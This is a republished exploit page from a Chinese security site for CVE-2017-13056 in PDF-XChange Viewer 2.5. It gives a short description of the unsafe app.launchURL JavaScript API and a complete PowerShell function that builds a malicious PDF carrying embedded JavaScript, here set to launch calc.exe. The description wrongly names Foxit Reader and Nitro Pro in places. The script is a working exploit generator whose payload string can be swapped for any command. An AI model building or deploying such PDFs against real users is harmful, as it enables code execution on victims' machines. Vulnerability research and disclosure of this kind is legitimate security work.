首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PDF-XChange Viewer 2.5 (Build 314.0) Code Execution
来源:vottadaniele@gmail.com 作者:Votta 发布时间:2017-08-29  
# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
# Date: 21-08-2017
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
# Exploit Author: Daniele Votta
# Contact: vottadaniele@gmail.com
# Website: https://www.linkedin.com/in/vottadaniele/
# CVE: 2017-13056

# Category: PDF Reader RCE
 
1. Description

This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer. 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within app.launchURL method. The issue results from the lack of proper validation of a user-supplied string
before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of the current process.
The launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog.

2. Proof of Concept (Generate evil PDF that start calc.exe) 
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
Step 3: Open the generated PDF with Nitro Pro PDF Reader
 
3. PDF Generation:

function New-PDFJS {

    

    # Use the desidered params

     [CmdletBinding()]
  
    Param (
        
    	[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
   
	[string]$msg = "Hello PDF",
 
        [string]$filename = "C:\Users\User\Desktop\calc.pdf"
  
    )

    

    # Use the PDFSharp-WPF.dll library path

    Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll

    $doc = New-Object PdfSharp.Pdf.PdfDocument
    $doc.Info.Title = $msg
    $doc.info.Creator = "AnonymousUser"
    $page = $doc.AddPage()

    $graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
    $font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
    $box  = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
    $graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)

    $dictjs = New-Object PdfSharp.Pdf.PdfDictionary
    $dictjs.Elements["/S"]  = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
    $dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
   
    $doc.Internals.AddObject($dictjs)

    $dict = New-Object PdfSharp.Pdf.PdfDictionary
    $pdfarray = New-Object PdfSharp.Pdf.PdfArray
    $embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")

    $dict.Elements["/Names"] = $pdfarray
    $pdfarray.Elements.Add($embeddedstring)
    $pdfarray.Elements.Add($dictjs.Reference)
    $doc.Internals.AddObject($dict)

    $dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
    $dictgroup.Elements["/JavaScript"] = $dict.Reference
    $doc.Internals.Catalog.Elements["/Names"] = $dictgroup

    $doc.Save($filename)
}
 



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MP3 WAV to CD Burner 1.4.24 -
·Dup Scout Enterprise 9.9.14 Bu
·My Video Converter 1.5.24 - Bu
·Dup Scout Enterprise 9.9.14 -
·Easy AVI DivX Converter 1.2.24
·Disk Savvy Enterprise 9.9.14 -
·Easy Video to iPod/MP4/PSP/3GP
·Sync Breeze Enterprise 9.9.16
·Automated Logic WebCTRL 6.5 -
·Disk Pulse Enterprise 9.9.16 -
·VX Search Enterprise 9.9.12 -
·Disk Pulse Enterprise 10.0.12
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved